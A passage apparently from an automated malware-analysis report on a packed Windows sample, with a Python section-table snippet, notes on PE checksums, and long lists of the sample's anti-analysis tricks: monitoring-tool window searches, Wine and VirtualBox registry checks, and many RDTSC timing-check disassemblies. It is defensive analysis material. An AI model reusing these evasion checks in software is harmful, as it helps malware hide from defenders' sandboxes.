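    (".taggant", 0x8000, b"\xe9" + b"\x00" * 0x1FF, SCN_EXEC | SCN_WRITE),
]
ENTRY_RVA = 0x8000   # entry point inside .taggant, as the report observes
```

Run on a real file, `triage(open(path, "rb").read())["findings"]` gives the same four classes of finding the report lists for file.exe; the "real checksum: 0x1ce329 should be: 0x1d4801" line above is the stored header value versus the recomputed one, and a mismatch like that usually means the image was rewritten after linking (here by the packer). A mismatching or zero checksum is not malicious on its own, since many legitimate linkers leave it at zero, so weigh it together with the section-name and entropy findings.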

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9860 (the GetProcAddress/LoadLibraryA import-resolution chain also listed under Data Obfuscation)

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13644)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB3544, second address: AB356F, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FAh 0x00000007 jbe 00007F33B8C742F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F33B8C742FEh 0x00000015 jbe 00007F33B8C74309h 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB25FE, second address: AB2602, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB2B9D, second address: AB2BA1, instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5C97, second address: AB5C9B, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5C9B, second address: AB5CA1, instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5CA1, second address: AB5CAB, instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5CAB, second address: AB5CCC, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F33B8C7430Fh 0x0000000d pushad 0x0000000e jmp 00007F33B8C74301h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5CCC, second address: AB5CEB, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 clc 0x00000007 push 00000000h 0x00000009 sbb cl, 00000040h 0x0000000c push B919429Fh 0x00000011 jnc 00007F33B8517EB2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F33B8517E96h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB5CEB, second address: AB5D46, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 46E6BDE1h 0x00000010 mov dword ptr [ebp+122D323Dh], esi 0x00000016 push 00000003h 0x00000018 xor edx, 6EBB74BBh 0x0000001e sub si, A257h 0x00000023 push 00000000h 0x00000025 or edi, dword ptr [ebp+122D2A62h] 0x0000002b push 00000003h 0x0000002d mov dword ptr [ebp+122D1D6Fh], eax 0x00000033 push 43EDAF25h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F33B8C74305h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB6019, second address: AB6028, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: AB6028, second address: AB6047, instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007F33B8C742FDh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: A94C69, second address: A94C77, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8517E96h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: A94C77, second address: A94C90, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FCh 0x00000009 ja 00007F33B8C742F6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A94C90 second address: A94CB6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517EA3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F33B8517E96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5222 second address: AD5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5227 second address: AD522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD546D second address: AD5475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5475 second address: AD548A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F33B8517E9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55DB second address: AD55F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F33B8C742FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55F0 second address: AD55F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55F4 second address: AD55FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD55FC second address: AD5619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8517EA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5619 second address: AD5644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007F33B8C742F6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F33B8C74308h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5644 second address: AD564E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD57B3 second address: AD57B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5908 second address: AD5939 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F33B8517EA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F33B8517EA4h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5D92 second address: AD5D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD603C second address: AD605D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ah 0x00000009 popad 0x0000000a jmp 00007F33B8517EA2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD605D second address: AD6062 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD62FA second address: AD62FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59D4 second address: AA59DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59DA second address: AA59FD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F33B8517EA3h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA59FD second address: AA5A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6B94 second address: AD6B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87C5 second address: AD87CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87CA second address: AD87F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8517E96h 0x0000000a jmp 00007F33B8517E9Ah 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jl 00007F33B8517EB5h 0x0000001e push eax 0x0000001f push edx 0x00000020 je 00007F33B8517E96h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD87F5 second address: AD87F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB336 second address: ADB33A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB6CF second address: ADB6EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983A1 second address: A983B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F33B8517E96h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983B6 second address: A983CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F33B8C742F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e jbe 00007F33B8C74313h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A983CE second address: A983D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F099 second address: A9F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74302h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F0B1 second address: A9F0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8517E96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE271C second address: AE2722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2722 second address: AE2749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8517EA2h 0x00000010 jp 00007F33B8517E96h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2749 second address: AE2760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8C742F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jng 00007F33B8C7430Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2760 second address: AE2787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA2h 0x00000009 pushad 0x0000000a jp 00007F33B8517E96h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 push edi 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2787 second address: AE27A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F33B8C742F6h 0x0000000d jmp 00007F33B8C74305h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2900 second address: AE2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2904 second address: AE290E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8C742F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2EC3 second address: AE2EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3011 second address: AE302A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FBh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b js 00007F33B8C742F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE302A second address: AE3047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F33B8517E96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F33B8517E9Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A70 second address: AE5A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A74 second address: AE5A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A78 second address: AE5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F33B8C742F8h 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F33B8C742F6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5A9E second address: AE5B17 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F33B8517EA1h 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F33B8517EA7h 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F33B8517E98h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 1EA4629Fh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F33B8517EA8h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5B17 second address: AE5B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5C57 second address: AE5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5EE0 second address: AE5EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6185 second address: AE618A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6671 second address: AE6688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6688 second address: AE668E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE668E second address: AE6692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE66F7 second address: AE6707 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6707 second address: AE670D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6B6A second address: AE6B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6BED second address: AE6BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6BF1 second address: AE6C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F33B8517EA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7263 second address: AE7268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE72EC second address: AE72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9CD1 second address: AE9D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 pushad 0x00000008 jmp 00007F33B8C74308h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA2F0 second address: AEA2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAD38 second address: AEAD4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F33B8C742F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F33B8C742F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB7DB second address: AEB811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jbe 00007F33B8517E9Eh 0x00000012 jo 00007F33B8517E98h 0x00000018 pushad 0x00000019 popad 0x0000001a nop 0x0000001b add edi, 5C1648AFh 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 mov di, dx 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F33B8517E9Ah 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB811 second address: AEB83D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F33B8C74301h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB5A0 second address: AEB5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDE8B second address: AEDEAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 jnc 00007F33B8C742F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEC0F1 second address: AEC108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517EA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEAC second address: AEDEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDEB0 second address: AEDEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE4C5 second address: AEE518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C74306h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F33B8C742F8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, dword ptr [ebp+122D2842h] 0x0000002f push 00000000h 0x00000031 cld 0x00000032 push 00000000h 0x00000034 stc 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE518 second address: AEE522 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A99F02 second address: A99F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74300h 0x00000009 jmp 00007F33B8C742FCh 0x0000000e popad 0x0000000f jl 00007F33B8C742FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2504 second address: AF252A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F33B8517EA3h 0x0000000c jmp 00007F33B8517E9Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
